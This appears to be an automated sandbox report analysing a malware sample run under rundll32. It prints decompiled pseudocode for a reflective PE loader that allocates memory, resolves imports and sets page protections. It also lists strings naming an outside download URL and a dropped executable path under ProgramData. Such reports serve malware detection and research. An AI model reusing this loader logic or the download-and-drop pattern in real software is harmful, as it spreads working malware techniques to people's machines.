    0x011b115e
    0x011b1166
    0x011b116c
    0x011b116c
    0x011b1175
    0x011b1182
    0x011b1192
    0x011b119a

    APIs
      • Part of subcall function 011B1640: wsprintfA.USER32 ref: 011B173A
      • Part of subcall function 011B1640: WSAStartup.WS2_32(00000102,?), ref: 011B174F
    • Sleep.KERNEL32(00003A98), ref: 011B1166
    Strings
    • http://veso2.xyz/campo/r/r1, xrefs: 011B10C7
    • C:\ProgramData\huqvg\huqvg.exe, xrefs: 011B10D6
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: SleepStartupwsprintf
    • String ID: C:\ProgramData\huqvg\huqvg.exe$http://veso2.xyz/campo/r/r1
    • API String ID: 1691369139-3004619249
    • Opcode ID: e7d2cb97b0cb01da27fa2c8a99e5a13aaf8a024fa461621dfa001970e00185b0
    • Instruction ID: 2644057d594e1b96c62770c71c6d60c044a97d76384809efa50eea62534cc6c6
    • Opcode Fuzzy Hash: e7d2cb97b0cb01da27fa2c8a99e5a13aaf8a024fa461621dfa001970e00185b0
    • Instruction Fuzzy Hash: 6D21C7B1E00108ABDB18DBA8E895ADFBB79FF48304F144038E515AB240D775B955C791
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B1040, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 286 11b1040-11b1092 CreateDirectoryA 287 11b1098 286->287 288 11b1094-11b1096 286->288 289 11b109a-11b10a7 call 11b1a04 287->289 288->289
    C-Code - Quality: 100%
    			E011B1040() {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t12;
				char _t13;
				int _t15;
				void* _t16;
				char _t17;
				intOrPtr _t18;
				char _t21;
				char _t22;
				signed int _t23;

				_v8 =  *0x11b3004 ^ _t23;
				_t12 = "C:\\ProgramData\\huqvg"; // 0x505c3a43
				_v32 = _t12;
				_t17 = "rogramData\\huqvg"; // 0x72676f72
				_v28 = _t17;
				_t21 = "amData\\huqvg"; // 0x61446d61
				_v24 = _t21;
				_t13 = "ta\\huqvg"; // 0x685c6174
				_v20 = _t13;
				_t18 =  *0x11b2110; // 0x67767175
				_v16 = _t18;
				_t22 =  *0x11b2114; // 0x0
				_v12 = _t22;
				_t15 = CreateDirectoryA( &_v32, 0); // executed
				if(_t15 == 0) {
					_t16 = 0;
				} else {
					_t16 = 1;
				}
				E011B1A04();
				return _t16;
			}



















    0x011b104d
    0x011b1050
    0x011b1055
    0x011b1058
    0x011b105e
    0x011b1061
    0x011b1067
    0x011b106a
    0x011b106f
    0x011b1072
    0x011b1078
    0x011b107b
    0x011b1081
    0x011b108a
    0x011b1092
    0x011b1098
    0x011b1094
    0x011b1094
    0x011b1094
    0x011b109f
    0x011b10a7

    APIs
    • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,011B12A3), ref: 011B108A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: CreateDirectory
    • String ID: C:\ProgramData\huqvg
    • API String ID: 4241100979-3793086718
    • Opcode ID: 7fc04c9c890db92ebd4aa4568dc63b7bcfd8a7f16f5c79869a81c90a0ab14fcc
    • Instruction ID: 0adb0d2b3c5bd1a3d4ded13d56f2461ccd8c99b20bcdab5b3ea3f398c1d71526
    • Opcode Fuzzy Hash: 7fc04c9c890db92ebd4aa4568dc63b7bcfd8a7f16f5c79869a81c90a0ab14fcc
    • Instruction Fuzzy Hash: 8A013C78E042499FCB1CCFA9E1D16AEBBF8FB1D200B10406ADA25A3344D7346A48CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01191460, Relevance: 3.1, APIs: 2, Instructions: 104COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 292 1191460-1191470 293 119147c-1191488 292->293 294 1191472-1191477 292->294 296 119148a-1191495 293->296 297 11914e4-11914f0 293->297 295 11915aa-11915ad 294->295 300 11914da-11914df 296->300 301 1191497-119149e 296->301 298 11914fb 297->298 299 11914f2-11914f9 297->299 302 1191502-1191514 298->302 299->302 300->295 303 11914a0-11914ae 301->303 304 11914c2-11914d4 VirtualFree 301->304 305 119151f 302->305 306 1191516-119151d 302->306 303->304 307 11914b0-11914c0 303->307 304->300 308 1191526-1191538 305->308 306->308 307->300 307->304 309 119153a-1191541 308->309 310 1191543 308->310 311 119154a-1191574 309->311 310->311 312 1191582-119159f VirtualProtect 311->312 313 1191576-119157f 311->313 314 11915a1-11915a3 312->314 315 11915a5 312->315 313->312 314->295 315->295
    C-Code - Quality: 100%
    			E01191460(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				int _t74;

				_v36 = __ecx;
				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						if((_a8[3] & 0x20000000) == 0) {
							_v12 = 0;
						} else {
							_v12 = 1;
						}
						_v24 = _v12;
						if((_a8[3] & 0x40000000) == 0) {
							_v16 = 0;
						} else {
							_v16 = 1;
						}
						_v28 = _v16;
						if((_a8[3] & 0x80000000) == 0) {
							_v20 = 0;
						} else {
							_v20 = 1;
						}
						_v32 = _v20;
						_t48 = _v28 * 8; // 0x2327118
						_v8 =  *((intOrPtr*)((_v24 << 4) + _t48 + 0x1195a00 + _v32 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v8 = _v8 | 0x00000200;
						}
						_t74 = VirtualProtect( *_a8, _a8[2], _v8,  &_v40); // executed
						if(_t74 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 != _a8[1]) {
						L8:
						return 1;
					}
					if(_a8[4] != 0) {
						L7:
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
						goto L8;
					}
					_t14 = _a4 + 0x30; // 0x0
					if( *((intOrPtr*)( *_a4 + 0x38)) ==  *_t14 || _a8[2] %  *(_a4 + 0x30) == 0) {
						goto L7;
					} else {
						goto L8;
					}
				}
				return 1;
			}













    0x01191466
    0x01191470
    0x01191488
    0x011914f0
    0x011914fb
    0x011914f2
    0x011914f2
    0x011914f2
    0x01191505
    0x01191514
    0x0119151f
    0x01191516
    0x01191516
    0x01191516
    0x01191529
    0x01191538
    0x01191543
    0x0119153a
    0x0119153a
    0x0119153a
    0x0119154d
    0x01191559
    0x01191566
    0x01191574
    0x0119157f
    0x0119157f
    0x01191597
    0x0119159f
    0x00000000
    0x011915a1
    0x00000000
    0x011915a1
    0x0119159f
    0x01191495
    0x011914da
    0x00000000
    0x011914da
    0x0119149e
    0x011914c2
    0x011914d4
    0x00000000
    0x011914d4
    0x011914ab
    0x011914ae
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011914ae
    0x00000000

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00004000,?,?,?,?,01191718,01194000,?,01194000,00000000), ref: 011914D4
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: 736f4e453990f8e213fa082cfd2cef6702f7b5cc1538a6ba9821d7d505220231
    • Instruction ID: 1bc97bbdbe5e4f1098041498a9df200a9fcb84808db464ec4b0e25de21cc698f
    • Opcode Fuzzy Hash: 736f4e453990f8e213fa082cfd2cef6702f7b5cc1538a6ba9821d7d505220231
    • Instruction Fuzzy Hash: 3541CB75A00209EFEB19CF48C494BA9B7B2FF88324F15C159E92A5F355C775EA81CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011912A0, Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 316 11912a0-11912ce 317 11912e2-11912ee 316->317 318 11912f4-11912fb 317->318 319 11913e6 317->319 320 11912fd-119130a 318->320 321 1191363-119137e call 1191270 318->321 322 11913eb-11913ee 319->322 323 119130c-119132e VirtualAlloc 320->323 324 119135e 320->324 331 1191380-1191382 321->331 332 1191384-11913a9 VirtualAlloc 321->332 326 1191330-1191332 323->326 327 1191337-119135b call 1191080 323->327 324->317 326->322 327->324 331->322 333 11913ab-11913ad 332->333 334 11913af-11913de call 11910d0 332->334 333->322 334->319
    C-Code - Quality: 100%
    			E011912A0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_t3 = _a16 + 4; // 0xf5e9
				_v16 =  *_t3;
				_t7 =  *_a16 + 0x14; // 0x508bf84d
				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x1191e76
				_v8 =  *_a16 + _t9;
				_v20 = 0;
				while(1) {
					_t17 =  *_a16 + 6; // 0xe9000000
					if(_v20 >= ( *_t17 & 0x0000ffff)) {
						break;
					}
					if( *(_v8 + 0x10) != 0) {
						if(E01191270(_v28, _a8,  *((intOrPtr*)(_v8 + 0x14)) +  *(_v8 + 0x10)) != 0) {
							_t76 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *(_v8 + 0x10), 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
								E011910D0(_v12, _a4 +  *((intOrPtr*)(_v8 + 0x14)),  *(_v8 + 0x10));
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v8 + 8)) = _v12;
								L1:
								_v20 = _v20 + 1;
								_v8 = _v8 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v24 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v24 <= 0) {
						L8:
						goto L1;
					}
					_v12 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)), _v24, 0x1000, 4);
					if(_v12 != 0) {
						_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
						 *((intOrPtr*)(_v8 + 8)) = _v12;
						E01191080(_v12, 0, _v24);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}











    0x011912a6
    0x011912ac
    0x011912af
    0x011912bc
    0x011912c0
    0x011912c4
    0x011912c7
    0x011912e2
    0x011912e7
    0x011912ee
    0x00000000
    0x00000000
    0x011912fb
    0x0119137e
    0x0119139c
    0x011913a2
    0x011913a9
    0x011913b8
    0x011913d0
    0x011913d5
    0x011913de
    0x011912d0
    0x011912d6
    0x011912df
    0x00000000
    0x011912df
    0x00000000
    0x011913ab
    0x00000000
    0x01191380
    0x01191303
    0x0119130a
    0x0119135e
    0x00000000
    0x0119135e
    0x01191327
    0x0119132e
    0x01191340
    0x01191349
    0x01191356
    0x0119135b
    0x00000000
    0x0119135b
    0x00000000
    0x01191330
    0x00000000

    APIs
    • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 01191321
    • VirtualAlloc.KERNELBASE(?,?,00001000,00000004,00000000,?,?,01191E5E), ref: 0119139C
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: cc0f37f7cd9fca80dcdc6e20672d933aabd4cfde5e50e9a2d97e381d2398f6f2
    • Instruction ID: fc17d52716a5ab1e7e837d6babf72a5493e6edf11659a6d31aeee3fee0a8024b
    • Opcode Fuzzy Hash: cc0f37f7cd9fca80dcdc6e20672d933aabd4cfde5e50e9a2d97e381d2398f6f2
    • Instruction Fuzzy Hash: 1551DA74E0420AEFCB08CF98C580AAEB7B1FF48314F248598E915AB345D371EE91DB95
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0119190D, Relevance: 2.5, APIs: 2, Instructions: 34COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 338 119190d-1191924 IsBadReadPtr 340 119192a-1191931 338->340 341 1191ae3-1191ae9 338->341 340->341 342 1191937-119194e call 1191af0 340->342 344 1191950-119195a 342->344 345 119195c-119196b SetLastError 344->345 346 1191970-1191985 call 1191170 344->346 345->341 348 119198a-1191994 346->348 349 11919c0-11919f0 348->349 350 1191996-11919bb SetLastError 348->350 351 1191a0b-1191a20 349->351 352 11919f2-1191a09 349->352 350->341 353 1191a23 351->353 352->353 355 1191a37-1191a3d 353->355 356 1191ab8-1191abc 355->356 357 1191a3f-1191a4a 355->357 358 1191ade 356->358 359 1191abe-1191adc SetLastError 356->359 360 1191a4c-1191a73 357->360 361 1191a75-1191aa0 357->361 358->341 359->341 365 1191aa2-1191aa8 360->365 361->365 366 1191aaa-1191ab1 365->366 367 1191ab3 365->367 366->356 367->355
    C-Code - Quality: 37%
    			E0119190D() {
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr _t102;
				intOrPtr _t118;
				intOrPtr _t123;
				void* _t179;
				void* _t181;
				void* _t183;
				void* _t184;

				L0:
				while(1) {
					L0:
					 *(_t179 - 4) =  *(_t179 - 4) + 0x14;
					if(IsBadReadPtr( *(_t179 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t179 - 4) + 0xc)) == 0) {
						break;
					}
					L3:
					_t7 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
					_t12 =  *((intOrPtr*)(_t179 + 8)) + 0x1c; // 0x0, executed
					_t99 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0xc)),  *_t7); // executed
					_t183 = _t181 + 8;
					 *((intOrPtr*)(_t179 - 0x14)) = _t99;
					if( *((intOrPtr*)(_t179 - 0x14)) != 0) {
						L5:
						_t17 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
						_t21 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
						_t102 = E01191170( *_t21, 4 +  *_t17 * 4); // executed
						_t184 = _t183 + 8;
						 *((intOrPtr*)(_t179 - 0x20)) = _t102;
						if( *((intOrPtr*)(_t179 - 0x20)) != 0) {
							L7:
							 *((intOrPtr*)( *((intOrPtr*)(_t179 + 8)) + 8)) =  *((intOrPtr*)(_t179 - 0x20));
							_t34 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
							_t36 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t179 - 0x14));
							_t41 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
							 *( *((intOrPtr*)(_t179 + 8)) + 0xc) =  *_t41 + 1;
							if( *( *(_t179 - 4)) == 0) {
								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
							} else {
								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 4));
								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
							}
							L12:
							while( *( *(_t179 - 8)) != 0) {
								if(( *( *(_t179 - 8)) & 0x80000000) == 0) {
									 *((intOrPtr*)(_t179 - 0x24)) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 8));
									_t77 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
									_t81 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
									_t118 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t179 - 0x14)),  *((intOrPtr*)(_t179 - 0x24)) + 2,  *_t77);
									_t184 = _t184 + 0xc;
									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t118;
								} else {
									_t67 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
									_t71 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
									_t123 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t179 - 0x14)),  *( *(_t179 - 8)) & 0x0000ffff,  *_t67);
									_t184 = _t184 + 0xc;
									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t123;
								}
								L16:
								if( *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) != 0) {
									L18:
									L11:
									 *(_t179 - 8) =  &(( *(_t179 - 8))[1]);
									 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0x10)) + 4;
									continue;
								} else {
									L17:
									 *((intOrPtr*)(_t179 - 0x18)) = 0;
								}
								break;
							}
							L19:
							if( *((intOrPtr*)(_t179 - 0x18)) != 0) {
								L21:
								continue;
							} else {
								L20:
								_t87 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
								_t90 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t179 - 0x14)),  *_t87);
								SetLastError(0x7f);
							}
						} else {
							L6:
							_t25 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
							_t28 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t179 - 0x14)),  *_t25);
							SetLastError(0xe);
							 *((intOrPtr*)(_t179 - 0x18)) = 0;
						}
					} else {
						L4:
						SetLastError(0x7e);
						 *((intOrPtr*)(_t179 - 0x18)) = 0;
					}
					break;
				}
				L22:
				_t95 =  *((intOrPtr*)(_t179 - 0x18));
				return _t95;
			}












    0x0119190d
    0x0119190d
    0x0119190d
    0x01191913
    0x01191924
    0x00000000
    0x00000000
    0x01191937
    0x0119193a
    0x0119194b
    0x0119194e
    0x01191950
    0x01191953
    0x0119195a
    0x01191970
    0x01191973
    0x01191981
    0x01191985
    0x0119198a
    0x0119198d
    0x01191994
    0x011919c0
    0x011919c6
    0x011919cc
    0x011919d2
    0x011919d8
    0x011919de
    0x011919e7
    0x011919f0
    0x01191a14
    0x01191a20
    0x011919f2
    0x011919fa
    0x01191a06
    0x01191a06
    0x00000000
    0x01191a37
    0x01191a4a
    0x01191a7d
    0x01191a83
    0x01191a95
    0x01191a98
    0x01191a9a
    0x01191aa0
    0x01191a4c
    0x01191a4f
    0x01191a66
    0x01191a69
    0x01191a6b
    0x01191a71
    0x01191a71
    0x01191aa2
    0x01191aa8
    0x01191ab3
    0x01191a25
    0x01191a2b
    0x01191a34
    0x00000000
    0x01191aaa
    0x01191aaa
    0x01191aaa
    0x01191aaa
    0x00000000
    0x01191aa8
    0x01191ab8
    0x01191abc
    0x01191ade
    0x00000000
    0x01191abe
    0x01191abe
    0x01191ac1
    0x01191acc
    0x01191acf
    0x01191ad6
    0x01191ad6
    0x01191996
    0x01191996
    0x01191999
    0x011919a4
    0x011919a7
    0x011919ae
    0x011919b4
    0x011919b4
    0x0119195c
    0x0119195c
    0x0119195e
    0x01191964
    0x01191964
    0x00000000
    0x0119195a
    0x01191ae3
    0x01191ae3
    0x01191ae9

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 0119191C
    • SetLastError.KERNEL32(0000007E), ref: 0119195E
    • SetLastError.KERNEL32(0000000E), ref: 011919AE
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$Read
    • String ID:
    • API String ID: 1935436914-0
    • Opcode ID: cf5b33e84e0a81aa6e6959ae18ac4b5670eb398fe7318fd0ef9f8f15333516b1
    • Instruction ID: a0a5ad8ece6fbb833eecc1f653db9957c191104e34b96774873a970715b3908c
    • Opcode Fuzzy Hash: cf5b33e84e0a81aa6e6959ae18ac4b5670eb398fe7318fd0ef9f8f15333516b1
    • Instruction Fuzzy Hash: 90011D74A00109EFDF18CF94C545BAEB7B1FF44314F248158E915AB241C774EE80DB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01181D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 370 1181d10-1181d1d 371 1181d29-1181d35 370->371 372 1181d1f-1181d24 370->372 374 1181d9d-1181da9 371->374 375 1181d37-1181d42 371->375 373 1181e71-1181e74 372->373 378 1181dab-1181db2 374->378 379 1181db4 374->379 376 1181d93-1181d98 375->376 377 1181d44-1181d4b 375->377 376->373 381 1181d4d-1181d5b 377->381 382 1181d6f-1181d8e call 1181820 377->382 380 1181dbb-1181dcd 378->380 379->380 383 1181dd8 380->383 384 1181dcf-1181dd6 380->384 381->382 385 1181d5d-1181d6d 381->385 387 1181d90 382->387 386 1181ddf-1181df1 383->386 384->386 385->376 385->382 388 1181dfc 386->388 389 1181df3-1181dfa 386->389 387->376 390 1181e03-1181e2e 388->390 389->390 391 1181e3c-1181e59 VirtualProtect 390->391 392 1181e30-1181e39 390->392 393 1181e5b-1181e6a call 1181b20 391->393 394 1181e6c 391->394 392->391 393->373 394->373
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 984b9021d3d393601abb29a9b3e196bc9194cf8d0190172f9ce7e7d42a9b0900
    • Instruction ID: 066a3092ac03e1d525e9862c7e65845d077e9979bb73819b05c883d04e9bb6ad
    • Opcode Fuzzy Hash: 984b9021d3d393601abb29a9b3e196bc9194cf8d0190172f9ce7e7d42a9b0900
    • Instruction Fuzzy Hash: E741DC75600109AFDB09EF48C494BAEB7B2FB88314F14C659E8195F355C775EA82CF80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01191AF0, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 398 1191af0-1191b05 LoadLibraryA 399 1191b0b 398->399 400 1191b07-1191b09 398->400 401 1191b0e-1191b11 399->401 400->401
    C-Code - Quality: 100%
    			E01191AF0(void* __ecx, CHAR* _a4) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA(_a4); // executed
				_v8 = _t6;
				if(_v8 != 0) {
					return _v8;
				}
				return 0;
			}





    0x01191af8
    0x01191afe
    0x01191b05
    0x00000000
    0x01191b0b
    0x00000000

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 01191AF8
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 9e5e95ccbc50b1846e547597d6ace6dcbec411cda637add383fe74853126e880
    • Instruction ID: f8d969d39a5b1997213698625e5910e5dafee96a4acf85ead5ff08d22ca1526f
    • Opcode Fuzzy Hash: 9e5e95ccbc50b1846e547597d6ace6dcbec411cda637add383fe74853126e880
    • Instruction Fuzzy Hash: B8D09E7491520DFBCF14DEA4D54955977B8E708261F104594E81A93204E6319E809A91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01191140, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E01191140(void* __ecx, long _a4) {
				void* _v8;
				void* _t5;

				_t5 = VirtualAlloc(0, _a4, 0x3000, 4); // executed
				_v8 = _t5;
				return _v8;
			}





    0x01191151
    0x01191157
    0x01191160

    APIs
    • VirtualAlloc.KERNELBASE(00000000,011911A1,00003000,00000004,00000004,?,011911A1,?), ref: 01191151
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 55365d9f391b0724cb139ffacbd962182b41090ecc177886234312e285e33eec
    • Instruction ID: 6fbfee506749483c16d6514154a3fdcfbf28a862b8f6bfe044fe0ba0efe07f96
    • Opcode Fuzzy Hash: 55365d9f391b0724cb139ffacbd962182b41090ecc177886234312e285e33eec
    • Instruction Fuzzy Hash: 15D0C974645208BBE714CA94D806F69BBACE704611F000194FE189B280D5B16E408791
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011819F0, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 408 11819f0-1181a10 VirtualAlloc
    APIs
    • VirtualAlloc.KERNELBASE(00000000,01181A51,00003000,00000004,000000BE,?,01181A51,?), ref: 01181A01
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 8c33c389b19e2db5b4dedb14a6e6bb0fddb0c5866bcbb382ca7211369f8d32dc
    • Instruction ID: 9123b34c5dfbd511595d3243a7ebdbee0d3e0d4b7c9c3000c9ebc8637a2ccbf8
    • Opcode Fuzzy Hash: 8c33c389b19e2db5b4dedb14a6e6bb0fddb0c5866bcbb382ca7211369f8d32dc
    • Instruction Fuzzy Hash: 22D0C9B4645208BBE714CA84D806F6DBBACE704A11F004195FE089B280D5B1AE0057A5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01181820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
    Download Yara Rule
    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 0118182F
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: b690a5414f2537f5be9a989ee1aabbdc63912484a82892f638aeb1c3f1641515
    • Instruction ID: 4eab7fc4b613ec6c49432f41034d068b610a70ad0b36fb10684601b302ac70b0
    • Opcode Fuzzy Hash: b690a5414f2537f5be9a989ee1aabbdc63912484a82892f638aeb1c3f1641515
    • Instruction Fuzzy Hash: BDC04C7611430CAB8B04DF98E884DAB37ADBB8CA10B14C518BA2D87204C730F9518BA4
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 011814A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON
    Download Yara Rule
    APIs
    • SetLastError.KERNEL32(0000007F), ref: 011814DB
